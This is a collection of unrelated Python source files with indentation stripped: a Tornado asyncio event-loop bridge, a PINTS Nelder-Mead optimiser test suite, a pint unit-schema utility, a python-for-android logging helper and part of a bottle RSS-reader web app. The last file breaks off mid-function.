import functools
from threading import get_ident
from tornado.gen import convert_yielded
from tornado.ioloop import IOLoop, _Selectable
import asyncio
import typing
from typing import Any, TypeVar, Awaitable, Callable, Union, Optional
if typing.TYPE_CHECKING:
from typing import Set, Dict, Tuple # noqa: F401
_T = TypeVar("_T")
class BaseAsyncIOLoop(IOLoop):
def initialize( # type: ignore
self, asyncio_loop: asyncio.AbstractEventLoop, **kwargs: Any
) -> None:
self.asyncio_loop = asyncio_loop
# Maps fd to (fileobj, handler function) pair (as in IOLoop.add_handler)
self.handlers = {} # type: Dict[int, Tuple[Union[int, _Selectable], Callable]]
# Set of fds listening for reads/writes
self.readers = set() # type: Set[int]
self.writers = set() # type: Set[int]
self.closing = False
# If an asyncio loop was closed through an asyncio interface
# instead of IOLoop.close(), we'd never hear about it and may
# have left a dangling reference in our map. In case an
# application (or, more likely, a test suite) creates and
# destroys a lot of event loops in this way, check here to
# ensure that we don't have a lot of dead loops building up in
# the map.
#
# TODO(bdarnell): consider making self.asyncio_loop a weakref
# for AsyncIOMainLoop and make _ioloop_for_asyncio a
# WeakKeyDictionary.
for loop in list(IOLoop._ioloop_for_asyncio):
if loop.is_closed():
del IOLoop._ioloop_for_asyncio[loop]
IOLoop._ioloop_for_asyncio[asyncio_loop] = self
self._thread_identity = 0
super(BaseAsyncIOLoop, self).initialize(**kwargs)
def assign_thread_identity() -> None:
self._thread_identity = get_ident()
self.add_callback(assign_thread_identity)
def close(self, all_fds: bool = False) -> None:
self.closing = True
for fd in list(self.handlers):
fileobj, handler_func = self.handlers[fd]
self.remove_handler(fd)
if all_fds:
self.close_fd(fileobj)
# Remove the mapping before closing the asyncio loop. If this
# happened in the other order, we could race against another
# initialize() call which would see the closed asyncio loop,
# assume it was closed from the asyncio side, and do this
# cleanup for us, leading to a KeyError.
del IOLoop._ioloop_for_asyncio[self.asyncio_loop]
self.asyncio_loop.close()
def add_handler(
self, fd: Union[int, _Selectable], handler: Callable[..., None], events: int
) -> None:
fd, fileobj = self.split_fd(fd)
if fd in self.handlers:
raise ValueError("fd %s added twice" % fd)
self.handlers[fd] = (fileobj, handler)
if events & IOLoop.READ:
self.asyncio_loop.add_reader(fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
if events & IOLoop.WRITE:
self.asyncio_loop.add_writer(fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
def update_handler(self, fd: Union[int, _Selectable], events: int) -> None:
fd, fileobj = self.split_fd(fd)
if events & IOLoop.READ:
if fd not in self.readers:
self.asyncio_loop.add_reader(fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
else:
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if events & IOLoop.WRITE:
if fd not in self.writers:
self.asyncio_loop.add_writer(fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
else:
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
def remove_handler(self, fd: Union[int, _Selectable]) -> None:
fd, fileobj = self.split_fd(fd)
if fd not in self.handlers:
return
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
del self.handlers[fd]
def _handle_events(self, fd: int, events: int) -> None:
fileobj, handler_func = self.handlers[fd]
handler_func(fileobj, events)
def start(self) -> None:
try:
old_loop = asyncio.get_event_loop()
except (RuntimeError, AssertionError):
old_loop = None # type: ignore
try:
self._setup_logging()
asyncio.set_event_loop(self.asyncio_loop)
self.asyncio_loop.run_forever()
finally:
asyncio.set_event_loop(old_loop)
def stop(self) -> None:
self.asyncio_loop.stop()
def call_at(
self, when: float, callback: Callable[..., None], *args: Any, **kwargs: Any
) -> object:
# asyncio.call_at supports *args but not **kwargs, so bind them here.
# We do not synchronize self.time and asyncio_loop.time, so
# convert from absolute to relative.
return self.asyncio_loop.call_later(
max(0, when - self.time()),
self._run_callback,
functools.partial(callback, *args, **kwargs),
)
def remove_timeout(self, timeout: object) -> None:
timeout.cancel() # type: ignore
def add_callback(self, callback: Callable, *args: Any, **kwargs: Any) -> None:
if get_ident() == self._thread_identity:
call_soon = self.asyncio_loop.call_soon
else:
call_soon = self.asyncio_loop.call_soon_threadsafe
try:
call_soon(self._run_callback, functools.partial(callback, *args, **kwargs))
except RuntimeError:
# "Event loop is closed". Swallow the exception for
# consistency with PollIOLoop (and logical consistency
# with the fact that we can't guarantee that an
# add_callback that completes without error will
# eventually execute).
pass
def add_callback_from_signal(
self, callback: Callable, *args: Any, **kwargs: Any
) -> None:
try:
self.asyncio_loop.call_soon_threadsafe(
self._run_callback, functools.partial(callback, *args, **kwargs)
)
except RuntimeError:
pass
def run_in_executor(
self,
executor: Optional[concurrent.futures.Executor],
func: Callable[..., _T],
*args: Any
) -> Awaitable[_T]:
return self.asyncio_loop.run_in_executor(executor, func, *args)
def set_default_executor(self, executor: concurrent.futures.Executor) -> None:
return self.asyncio_loop.set_default_executor(executor)
class AsyncIOMainLoop(BaseAsyncIOLoop):
"""``AsyncIOMainLoop`` creates an `.IOLoop` that corresponds to the
current ``asyncio`` event loop (i.e. the one returned by
``asyncio.get_event_loop()``).
.. deprecated:: 5.0
Now used automatically when appropriate; it is no longer necessary
to refer to this class directly.
.. versionchanged:: 5.0
Closing an `AsyncIOMainLoop` now closes the underlying asyncio loop.
"""
def initialize(self, **kwargs: Any) -> None: # type: ignore
super(AsyncIOMainLoop, self).initialize(asyncio.get_event_loop(), **kwargs)
def make_current(self) -> None:
# AsyncIOMainLoop already refers to the current asyncio loop so
# nothing to do here.
pass
class AsyncIOLoop(BaseAsyncIOLoop):
"""``AsyncIOLoop`` is an `.IOLoop` that runs on an ``asyncio`` event loop.
This class follows the usual Tornado semantics for creating new
``IOLoops``; these loops are not necessarily related to the
``asyncio`` default event loop.
Each ``AsyncIOLoop`` creates a new ``asyncio.EventLoop``; this object
can be accessed with the ``asyncio_loop`` attribute.
.. versionchanged:: 5.0
When an ``AsyncIOLoop`` becomes the current `.IOLoop`, it also sets
the current `asyncio` event loop.
.. deprecated:: 5.0
Now used automatically when appropriate; it is no longer necessary
to refer to this class directly.
"""
def initialize(self, **kwargs: Any) -> None: # type: ignore
self.is_current = False
loop = asyncio.new_event_loop()
try:
super(AsyncIOLoop, self).initialize(loop, **kwargs)
except Exception:
# If initialize() does not succeed (taking ownership of the loop),
# we have to close it.
loop.close()
raise
def close(self, all_fds: bool = False) -> None:
if self.is_current:
self.clear_current()
super(AsyncIOLoop, self).close(all_fds=all_fds)
def make_current(self) -> None:
if not self.is_current:
try:
self.old_asyncio = asyncio.get_event_loop()
except (RuntimeError, AssertionError):
self.old_asyncio = None # type: ignore
self.is_current = True
asyncio.set_event_loop(self.asyncio_loop)
def _clear_current_hook(self) -> None:
if self.is_current:
asyncio.set_event_loop(self.old_asyncio)
self.is_current = False
def to_tornado_future(asyncio_future: asyncio.Future) -> asyncio.Future:
"""Convert an `asyncio.Future` to a `tornado.concurrent.Future`.
.. versionadded:: 4.1
.. deprecated:: 5.0
Tornado ``Futures`` have been merged with `asyncio.Future`,
so this method is now a no-op.
"""
return asyncio_future
def to_asyncio_future(tornado_future: asyncio.Future) -> asyncio.Future:
"""Convert a Tornado yieldable object to an `asyncio.Future`.
.. versionadded:: 4.1
.. versionchanged:: 4.3
Now accepts any yieldable object, not just
`tornado.concurrent.Future`.
.. deprecated:: 5.0
Tornado ``Futures`` have been merged with `asyncio.Future`,
so this method is now equivalent to `tornado.gen.convert_yielded`.
"""
return convert_yielded(tornado_future)
class AnyThreadEventLoopPolicy(asyncio.DefaultEventLoopPolicy): # type: ignore
"""Event loop policy that allows loop creation on any thread.
The default `asyncio` event loop policy only automatically creates
event loops in the main threads. Other threads must create event
loops explicitly or `asyncio.get_event_loop` (and therefore
`.IOLoop.current`) will fail. Installing this policy allows event
loops to be created automatically on any thread, matching the
behavior of Tornado versions prior to 5.0 (or 5.0 on Python 2).
Usage::
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
.. versionadded:: 5.0
"""
def get_event_loop(self) -> asyncio.AbstractEventLoop:
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
# This was an AssertionError in python 3.4.2 (which ships with debian jessie)
# and changed to a RuntimeError in 3.4.3.
# "There is no current event loop in thread %r"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
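# Illustrative sketch (an assumption, not part of this module): before Tornado
# 5.0 the bridge had to be installed explicitly, e.g.
#     from tornado.platform.asyncio import AsyncIOMainLoop
#     AsyncIOMainLoop().install()
# From 5.0 onwards the classes above are selected automatically whenever
# asyncio is available, so no explicit install step is needed.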
|
|
#!/usr/bin/env python3
#
# Tests the basic methods of the Nelder-Mead optimiser.
#
# This file is part of PINTS (https://github.com/pints-team/pints/) which is
# released under the BSD 3-clause license. See accompanying LICENSE.md for
# copyright notice and full license details.
#
import numpy as np
import unittest
import sys
import pints
import pints.toy
from shared import StreamCapture
debug = False
method = pints.NelderMead
class TestNelderMead(unittest.TestCase):
"""
Tests the basic methods of the Nelder-Mead optimiser.
"""
def setUp(self):
""" Called before every test """
np.random.seed(1)
def problem(self):
""" Returns a test problem, starting point, sigma, and boundaries. """
r = pints.toy.ParabolicError()
x = [0.1, 0.1]
s = 0.1
b = pints.RectangularBoundaries([-1, -1], [1, 1])
return r, x, s, b
def test_unbounded(self):
# Runs an optimisation without boundaries.
r, x, s, b = self.problem()
opt = pints.OptimisationController(r, x, method=method)
opt.set_threshold(1e-3)
opt.set_log_to_screen(debug)
found_parameters, found_solution = opt.run()
self.assertTrue(found_solution < 1e-3)
@unittest.skipIf(sys.hexversion < 0x03040000, 'Python < 3.4')
def test_bounded_warning(self):
# Boundaries are not supported
r, x, s, b = self.problem()
# Rectangular boundaries
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
pints.OptimisationController(r, x, boundaries=b, method=method)
self.assertEqual(len(w), 1)
self.assertIn('does not support boundaries', str(w[-1].message))
def test_ask_tell(self):
# Tests ask-and-tell related error handling.
r, x, s, b = self.problem()
opt = method(x)
# Stop called when not running
self.assertFalse(opt.stop())
# Best position and score called before run
self.assertEqual(list(opt.xbest()), list(x))
self.assertEqual(opt.fbest(), float('inf'))
# Not running
self.assertFalse(opt.running())
# Running
xs = opt.ask()
fxs = [r(x) for x in xs]
self.assertTrue(opt.running())
opt.tell(fxs)
self.assertTrue(opt.running())
xs = opt.ask()
fxs = [r(x) for x in xs]
opt.tell(fxs)
# Tell before ask
self.assertRaisesRegex(
Exception, r'ask\(\) not called before tell\(\)', opt.tell, 5)
# Ask called twice
opt.ask()
self.assertRaisesRegex(
Exception, r'ask\(\) called twice', opt.ask)
def test_hyper_parameter_interface(self):
# Tests the hyper parameter interface for this optimiser.
r, x, s, b = self.problem()
opt = pints.OptimisationController(r, x, method=method)
m = opt.optimiser()
self.assertEqual(m.n_hyper_parameters(), 0)
def test_name(self):
# Tests the name() method.
opt = method(np.array([0, 1.01]))
self.assertIn('Nelder-Mead', opt.name())
def test_zeros_in_x(self):
# Tests if the method copes with zeros in x0 (which can go wrong
# depending on the initialisation method).
r = pints.toy.RosenbrockError()
x0 = [0, 0]
opt = pints.OptimisationController(r, x0, method=method)
opt.set_log_to_screen(False)
x, f = opt.run()
self.assertTrue(np.all(x == np.array([1, 1])))
self.assertEqual(f, 0)
def test_bad_tell(self):
# Tests errors if wrong sizes are passed to tell
r = pints.toy.RosenbrockError()
e = pints.SequentialEvaluator(r)
x0 = [0, 0]
# Give wrong initial number
opt = method(x0)
xs = opt.ask()
fxs = e.evaluate(xs)
self.assertRaisesRegex(
ValueError, r'of length \(1 \+ n_parameters\)', opt.tell, fxs[:-1])
# Give wrong intermediate answer
opt = method(x0)
opt.tell(e.evaluate(opt.ask()))
x = opt.ask()[0]
fx = e.evaluate([x])
self.assertRaisesRegex(
ValueError, 'only a single evaluation', opt.tell, [fx, fx])
# Give wrong answer in shrink step
with self.assertRaisesRegex(ValueError, 'length n_parameters'):
opt = method(x0)
for i in range(500):
opt.tell(e.evaluate(opt.ask()))
if opt._shrink:
xs = opt.ask()
fxs = e.evaluate(xs)
opt.tell(fxs[:-1])
break
def test_rosenbrock(self):
# Tests the actions of the optimiser against a stored result
r = pints.toy.RosenbrockError()
x0 = [-0.75, 3.5]
opt = pints.OptimisationController(r, x0, method=method)
opt.set_log_to_screen(True)
with StreamCapture() as c:
x, f = opt.run()
log = c.text()
self.assertTrue(np.all(x == np.array([1, 1])))
self.assertEqual(f, 0)
exp_lines = (
'Minimising error measure',
'Using Nelder-Mead',
'Running in sequential mode.',
'Iter. Eval. Best Time m:s',
'0 3 865.9531 0:00.0',
'1 4 832.5452 0:00.0',
'2 5 832.5452 0:00.0',
'3 6 628.243 0:00.0',
'20 23 4.95828 0:00.0',
'40 43 3.525867 0:00.0',
'60 63 2.377579 0:00.0',
'80 83 1.114115 0:00.0',
'100 103 0.551 0:00.0',
'120 123 0.237 0:00.0',
'140 143 0.0666 0:00.0',
'160 163 0.00181 0:00.0',
'180 183 6.96e-06 0:00.0',
'200 203 2.66e-08 0:00.0',
'220 223 5.06e-11 0:00.0',
'240 243 2.43e-15 0:00.0',
'260 263 5.58e-18 0:00.0',
'280 283 7.74e-20 0:00.0',
'300 303 6.66e-23 0:00.0',
'320 323 1.86e-25 0:00.0',
'340 343 3.16e-28 0:00.0',
'360 364 3.08e-31 0:00.0',
'380 390 0 0:00.0',
'400 416 0 0:00.0',
'420 443 0 0:00.0',
'422 444 0 0:00.0',
'Halting: No significant change for 200 iterations.',
)
        # Compare length of log
log_lines = [line.rstrip() for line in log.splitlines()]
self.assertEqual(len(log_lines), len(exp_lines))
        # Compare log lines, ignoring the time bit (unless it's way too slow)
for i, line1 in enumerate(log_lines):
line2 = exp_lines[i]
if line2[-6:] == '0:00.0':
line1 = line1[:-6]
line2 = line2[:-6]
self.assertEqual(line1, line2)
if __name__ == '__main__':
print('Add -v for more debug output')
import sys
if '-v' in sys.argv:
debug = True
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from fnmatch import fnmatch
# make units optional when importing jsonextended
try:
import numpy as np
except ImportError:
pass
from jsonextended.edict import flatten, flatten2d, unflatten, merge
def get_in_units(value, units):
"""get a value in the required units """
try:
from pint import UnitRegistry
ureg = UnitRegistry()
except ImportError:
raise ImportError('please install pint to use this module')
return ureg.Quantity(value, units)
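# Minimal usage sketch (assumes pint is installed; not part of the original):
#     >>> str(get_in_units(1.0, 'nanometer'))
#     '1.0 nanometer'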
def apply_unitschema(data, uschema, as_quantity=True,
raise_outerr=False, convert_base=False,
use_wildcards=False, list_of_dicts=False):
""" apply the unit schema to the data
Parameters
----------
data : dict
uschema : dict
units schema to apply
as_quantity : bool
if true, return values as pint.Quantity objects
raise_outerr : bool
raise error if a unit cannot be found in the outschema
    convert_base : bool
rescale units to base units
use_wildcards : bool
if true, can use * (matches everything) and ? (matches any single character)
list_of_dicts: bool
treat list of dicts as additional branches
Examples
--------
>>> from pprint import pprint
>>> data = {'energy':1,'x':[1,2],'other':{'y':[4,5]},'y':[4,5],'meta':None}
>>> uschema = {'energy':'eV','x':'nm','other':{'y':'m'},'y':'cm'}
>>> data_units = apply_unitschema(data,uschema)
>>> pprint(data_units)
{'energy': <Quantity(1, 'electron_volt')>,
'meta': None,
'other': {'y': <Quantity([4 5], 'meter')>},
'x': <Quantity([1 2], 'nanometer')>,
'y': <Quantity([4 5], 'centimeter')>}
>>> newschema = {'energy':'kJ','other':{'y':'nm'},'y':'m'}
>>> new_data = apply_unitschema(data_units,newschema)
>>> str(new_data["energy"])
'1.60217653e-22 kilojoule'
>>> new_data["other"]["y"].magnitude.round(3).tolist(), str(new_data["other"]["y"].units)
([4000000000.0, 5000000000.0], 'nanometer')
>>> old_data = apply_unitschema(new_data,uschema,as_quantity=False)
>>> old_data["energy"]
1.0
>>> old_data["other"]["y"].round(3).tolist()
[4.0, 5.0]
""" # noqa: E501
try:
from pint import UnitRegistry
ureg = UnitRegistry()
from pint.quantity import _Quantity
except ImportError:
raise ImportError('please install pint to use this module')
list_of_dicts = '__list__' if list_of_dicts else None
# flatten edict
uschema_flat = flatten(uschema, key_as_tuple=True)
# sorted by longest key size, to get best match first
uschema_keys = sorted(uschema_flat, key=len, reverse=True)
data_flat = flatten(data, key_as_tuple=True, list_of_dicts=list_of_dicts)
for dkey, dvalue in data_flat.items():
converted = False
for ukey in uschema_keys:
if not len(ukey) == len(dkey[-len(ukey):]):
continue
if use_wildcards:
match = all(
[fnmatch(d, u) for u, d in zip(ukey, dkey[-len(ukey):])])
else:
match = ukey == dkey[-len(ukey):]
if match:
                # lists/tuples are converted to numpy arrays (object dtype is cast to float)
if isinstance(dvalue, (list, tuple)):
dvalue = np.array(dvalue)
if dvalue.dtype == np.object:
dvalue = dvalue.astype(float)
if isinstance(dvalue, _Quantity):
quantity = dvalue.to(uschema_flat[ukey])
else:
quantity = ureg.Quantity(dvalue, uschema_flat[ukey])
if convert_base:
quantity = quantity.to_base_units()
if as_quantity:
data_flat[dkey] = quantity
else:
data_flat[dkey] = quantity.magnitude
                converted = True
                break
if not converted and raise_outerr:
raise KeyError('could not find units for {}'.format(dkey))
return unflatten(data_flat, list_of_dicts=list_of_dicts)
def split_quantities(data, units='units', magnitude='magnitude',
list_of_dicts=False):
""" split pint.Quantity objects into <unit,magnitude> pairs
Parameters
----------
data : dict
units : str
name for units key
magnitude : str
name for magnitude key
list_of_dicts: bool
treat list of dicts as additional branches
Examples
--------
>>> from pprint import pprint
>>> from pint import UnitRegistry
>>> ureg = UnitRegistry()
>>> Q = ureg.Quantity
>>> qdata = {'energy': Q(1.602e-22, 'kilojoule'),
... 'meta': None,
... 'other': {'y': Q([4,5,6], 'nanometer')},
... 'x': Q([1,2,3], 'nanometer'),
... 'y': Q([8,9,10], 'meter')}
...
>>> split_data = split_quantities(qdata)
>>> pprint(split_data)
{'energy': {'magnitude': 1.602e-22, 'units': 'kilojoule'},
'meta': None,
'other': {'y': {'magnitude': array([4, 5, 6]), 'units': 'nanometer'}},
'x': {'magnitude': array([1, 2, 3]), 'units': 'nanometer'},
'y': {'magnitude': array([ 8, 9, 10]), 'units': 'meter'}}
"""
try:
from pint.quantity import _Quantity
except ImportError:
raise ImportError('please install pint to use this module')
list_of_dicts = '__list__' if list_of_dicts else None
data_flatten = flatten(data, list_of_dicts=list_of_dicts)
for key, val in data_flatten.items():
if isinstance(val, _Quantity):
data_flatten[key] = {units: str(val.units),
magnitude: val.magnitude}
return unflatten(data_flatten, list_of_dicts=list_of_dicts)
def combine_quantities(data, units='units', magnitude='magnitude',
list_of_dicts=False):
""" combine <unit,magnitude> pairs into pint.Quantity objects
Parameters
----------
data : dict
units : str
name of units key
magnitude : str
name of magnitude key
list_of_dicts: bool
treat list of dicts as additional branches
Examples
--------
>>> from pprint import pprint
>>> sdata = {'energy': {'magnitude': 1.602e-22, 'units': 'kilojoule'},
... 'meta': None,
... 'other': {'y': {'magnitude': [4, 5, 6], 'units': 'nanometer'}},
... 'x': {'magnitude': [1, 2, 3], 'units': 'nanometer'},
... 'y': {'magnitude': [8,9,10], 'units': 'meter'}}
...
>>> combined_data = combine_quantities(sdata)
>>> pprint(combined_data)
{'energy': <Quantity(1.602e-22, 'kilojoule')>,
'meta': None,
'other': {'y': <Quantity([4 5 6], 'nanometer')>},
'x': <Quantity([1 2 3], 'nanometer')>,
'y': <Quantity([ 8 9 10], 'meter')>}
""" # noqa: E501
try:
from pint import UnitRegistry
ureg = UnitRegistry()
except ImportError:
raise ImportError('please install pint to use this module')
list_of_dicts = '__list__' if list_of_dicts else None
data_flatten2d = flatten2d(data, list_of_dicts=list_of_dicts)
new_dict = {}
for key, val in list(data_flatten2d.items()):
if units in val and magnitude in val:
quantity = ureg.Quantity(val.pop(magnitude), val.pop(units))
if not val:
data_flatten2d.pop(key)
new_dict[key] = quantity
final_dict = merge([data_flatten2d, new_dict])
# olddict = unflatten(data_flatten2d,list_of_dicts=list_of_dicts)
# new_dict = unflatten(new_dict,list_of_dicts=list_of_dicts)
return unflatten(
final_dict, list_of_dicts=list_of_dicts) # merge([olddict,new_dict])
if __name__ == '__main__':
import doctest
print(doctest.testmod())
|
|
import logging
import os
import re
import sh
from sys import stdout, stderr
from math import log10
from collections import defaultdict
from colorama import Style as Colo_Style, Fore as Colo_Fore
import six
# This codecs change fixes a bug with log output, but crashes under python3
if not six.PY3:
import codecs
stdout = codecs.getwriter('utf8')(stdout)
stderr = codecs.getwriter('utf8')(stderr)
if six.PY2:
unistr = unicode
else:
unistr = str
# monkey patch to show full output
sh.ErrorReturnCode.truncate_cap = 999999
class LevelDifferentiatingFormatter(logging.Formatter):
def format(self, record):
if record.levelno > 30:
record.msg = '{}{}[ERROR]{}{}: '.format(
Err_Style.BRIGHT, Err_Fore.RED, Err_Fore.RESET,
Err_Style.RESET_ALL) + record.msg
elif record.levelno > 20:
record.msg = '{}{}[WARNING]{}{}: '.format(
Err_Style.BRIGHT, Err_Fore.RED, Err_Fore.RESET,
Err_Style.RESET_ALL) + record.msg
elif record.levelno > 10:
record.msg = '{}[INFO]{}: '.format(
Err_Style.BRIGHT, Err_Style.RESET_ALL) + record.msg
else:
record.msg = '{}{}[DEBUG]{}{}: '.format(
Err_Style.BRIGHT, Err_Fore.LIGHTBLACK_EX, Err_Fore.RESET,
Err_Style.RESET_ALL) + record.msg
return super(LevelDifferentiatingFormatter, self).format(record)
logger = logging.getLogger('p4a')
if not hasattr(logger, 'touched'): # Necessary as importlib reloads
# this, which would add a second
# handler and reset the level
logger.setLevel(logging.INFO)
logger.touched = True
ch = logging.StreamHandler(stderr)
formatter = LevelDifferentiatingFormatter('%(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
info = logger.info
debug = logger.debug
warning = logger.warning
error = logger.error
class colorama_shim(object):
def __init__(self, real):
self._dict = defaultdict(str)
self._real = real
self._enabled = False
def __getattr__(self, key):
return getattr(self._real, key) if self._enabled else self._dict[key]
def enable(self, enable):
self._enabled = enable
Out_Style = colorama_shim(Colo_Style)
Out_Fore = colorama_shim(Colo_Fore)
Err_Style = colorama_shim(Colo_Style)
Err_Fore = colorama_shim(Colo_Fore)
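# When color is disabled the shims resolve every attribute to '', so format
# strings such as '{}{}'.format(Err_Style.BRIGHT, Err_Fore.RED) degrade to
# plain, uncolored text instead of emitting ANSI escape codes.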
def setup_color(color):
enable_out = (False if color == 'never' else
True if color == 'always' else
stdout.isatty())
Out_Style.enable(enable_out)
Out_Fore.enable(enable_out)
enable_err = (False if color == 'never' else
True if color == 'always' else
stderr.isatty())
Err_Style.enable(enable_err)
Err_Fore.enable(enable_err)
def info_main(*args):
logger.info(''.join([Err_Style.BRIGHT, Err_Fore.GREEN] + list(args) +
[Err_Style.RESET_ALL, Err_Fore.RESET]))
def info_notify(s):
info('{}{}{}{}'.format(Err_Style.BRIGHT, Err_Fore.LIGHTBLUE_EX, s,
Err_Style.RESET_ALL))
def shorten_string(string, max_width):
    ''' Make a length-limited string of the form:
        "the string is very lo...(and 15 more)"
'''
string_len = len(string)
if string_len <= max_width:
return string
visible = max_width - 16 - int(log10(string_len))
# expected suffix len "...(and XXXXX more)"
if not isinstance(string, unistr):
visstring = unistr(string[:visible], errors='ignore')
else:
visstring = string[:visible]
return u''.join((visstring, u'...(and ',
unistr(string_len - visible), u' more)'))
def get_console_width():
try:
cols = int(os.environ['COLUMNS'])
except (KeyError, ValueError):
pass
else:
if cols >= 25:
return cols
try:
cols = max(25, int(os.popen('stty size', 'r').read().split()[1]))
except Exception:
pass
else:
return cols
return 100
def shprint(command, *args, **kwargs):
'''Runs the command (which should be an sh.Command instance), while
logging the output.'''
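    # Illustrative call (an assumption, not from the original file):
    #     shprint(sh.ls, '-la', _tail=20, _critical=True)
    # Keyword arguments prefixed with '_' are consumed here; the rest are
    # passed straight through to the sh.Command.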
kwargs["_iter"] = True
kwargs["_out_bufsize"] = 1
kwargs["_err_to_out"] = True
kwargs["_bg"] = True
is_critical = kwargs.pop('_critical', False)
tail_n = kwargs.pop('_tail', 0)
filter_in = kwargs.pop('_filter', None)
filter_out = kwargs.pop('_filterout', None)
if len(logger.handlers) > 1:
logger.removeHandler(logger.handlers[1])
columns = get_console_width()
command_path = str(command).split('/')
command_string = command_path[-1]
string = ' '.join(['{}->{} running'.format(Out_Fore.LIGHTBLACK_EX,
Out_Style.RESET_ALL),
command_string] + list(args))
# If logging is not in DEBUG mode, trim the command if necessary
if logger.level > logging.DEBUG:
logger.info('{}{}'.format(shorten_string(string, columns - 12),
Err_Style.RESET_ALL))
else:
logger.debug('{}{}'.format(string, Err_Style.RESET_ALL))
need_closing_newline = False
try:
msg_hdr = ' working: '
msg_width = columns - len(msg_hdr) - 1
output = command(*args, **kwargs)
for line in output:
if logger.level > logging.DEBUG:
msg = line.replace(
'\n', ' ').replace(
'\t', ' ').replace(
'\b', ' ').rstrip()
if msg:
stdout.write(u'{}\r{}{:<{width}}'.format(
Err_Style.RESET_ALL, msg_hdr,
shorten_string(msg, msg_width), width=msg_width))
stdout.flush()
need_closing_newline = True
else:
logger.debug(''.join(['\t', line.rstrip()]))
if need_closing_newline:
stdout.write('{}\r{:>{width}}\r'.format(
Err_Style.RESET_ALL, ' ', width=(columns - 1)))
stdout.flush()
except sh.ErrorReturnCode as err:
if need_closing_newline:
stdout.write('{}\r{:>{width}}\r'.format(
Err_Style.RESET_ALL, ' ', width=(columns - 1)))
stdout.flush()
if tail_n or filter_in or filter_out:
def printtail(out, name, forecolor, tail_n=0,
re_filter_in=None, re_filter_out=None):
lines = out.splitlines()
if re_filter_in is not None:
lines = [l for l in lines if re_filter_in.search(l)]
if re_filter_out is not None:
lines = [l for l in lines if not re_filter_out.search(l)]
if tail_n == 0 or len(lines) <= tail_n:
info('{}:\n{}\t{}{}'.format(
name, forecolor, '\t\n'.join(lines), Out_Fore.RESET))
else:
info('{} (last {} lines of {}):\n{}\t{}{}'.format(
name, tail_n, len(lines),
forecolor, '\t\n'.join([s for s in lines[-tail_n:]]),
Out_Fore.RESET))
printtail(err.stdout.decode('utf-8'), 'STDOUT', Out_Fore.YELLOW, tail_n,
re.compile(filter_in) if filter_in else None,
re.compile(filter_out) if filter_out else None)
printtail(err.stderr.decode('utf-8'), 'STDERR', Err_Fore.RED)
if is_critical:
env = kwargs.get("env")
if env is not None:
info("{}ENV:{}\n{}\n".format(
Err_Fore.YELLOW, Err_Fore.RESET, "\n".join(
"set {}={}".format(n, v) for n, v in env.items())))
info("{}COMMAND:{}\ncd {} && {} {}\n".format(
Err_Fore.YELLOW, Err_Fore.RESET, os.getcwd(), command,
' '.join(args)))
warning("{}ERROR: {} failed!{}".format(
Err_Fore.RED, command, Err_Fore.RESET))
exit(1)
else:
raise
return output
|
|
import json
import math
try:
from urllib.parse import urlencode, urlunsplit
except ImportError:
from urlparse import urlunsplit
from urllib import urlencode
from bottle import Response, error, route, run, template, install, redirect, hook, \
request, response, abort, static_file, JSONPlugin, url
from models import *
import logging
#logger = logging.getLogger("peewee")
#logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
@error(500)
@error(404)
@error(403)
@error(510)
def custom_error(error) -> Response:
if request.get_header('Accept') == 'application/json':
return Response(json.dumps({'message': error.body}), status=error.status_code)
else:
return Response(error.status + ", " + error.body, status=error.status_code)
class CustomJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return str(obj.strftime("%Y-%m-%d %H:%M:%S"))
if isinstance(obj, Model):
return obj.__dict__['_data']
return json.JSONEncoder.default(self, obj)
install(JSONPlugin(json_dumps=lambda s: json.dumps(s, cls=CustomJsonEncoder)))
def request_accept_json():
return request.get_header('Accept') == 'application/json'
def is_active(url: str) -> str:
params = request.query
valid_keys = 'starred'
valid_params = dict((k, v) for k, v in params.items() if k in valid_keys)
full_path = urlunsplit(('', '', request.path, urlencode(valid_params), ''))
return 'active' if full_path == url else ''
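# Example (sketch): with request.path == '/items' and query '?starred=1',
# is_active('/items?starred=1') returns 'active', presumably used by the
# templates to mark the current navigation entry.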
def favicon(id: str) -> str:
file = str(id) + '.ico'
path = 'feed.png'
if os.path.exists(os.path.join('static', 'favicons', file)):
path = 'favicons/' + file
return url('/static/<filename:path>', filename=path)
def date_format(date: DateField) -> str:
formatted = '--:--'
if date:
formatted = date.strftime('%H:%M') if (date.date() == datetime.today().date()) else date.strftime('%y-%m-%d')
return formatted
@hook('before_request')
def connect():
db.connect()
@hook('after_request')
def disconnect():
if not db.is_closed():
db.close()
@route('/')
def index():
redirect(url('/items'))
@route('/channels/<id:int>/items', method='GET')
@route('/items', method='GET')
def items(id:int=None) -> str:
valid_params = {'1': True, '0': False}
starred = valid_params.get(request.query.getone('starred'))
read = valid_params.get(request.query.getone('read'))
channel_ids = [int(i) for i in request.query.getlist('channel')]
channel_ids += [id] if id is not None else []
since_id = request.query.since_id
max_id = request.query.max_id
count = int(request.query.count) if request.query.count else 25
page = int(request.query.page) if request.query.page else 1
search = request.query.q
query = Item.select()
#for channel_id in channel_ids:
if channel_ids:
query = query.where(Item.channel << channel_ids)
if starred:
query = query.where(Item.starred == starred)
if read:
query = query.where(Item.read == read)
if since_id:
query = query.where(Item.id >= since_id)
if max_id:
query = query.where(Item.id <= max_id)
if search:
search = '%' + search + '%'
query = query.where(Item.title ** search | Item.description ** search | Item.author ** search)
#total_count = query.count()
if page and count: query = query.paginate(page, count)
for it in query:
it.new = False
it.save()
out = {'items': list(query.order_by(Item.updated.desc()).limit(count))}
channels = Channel.select().order_by(Channel.title)
for c in channels:
c.filter = True if c.id in channel_ids else False
#if channel:
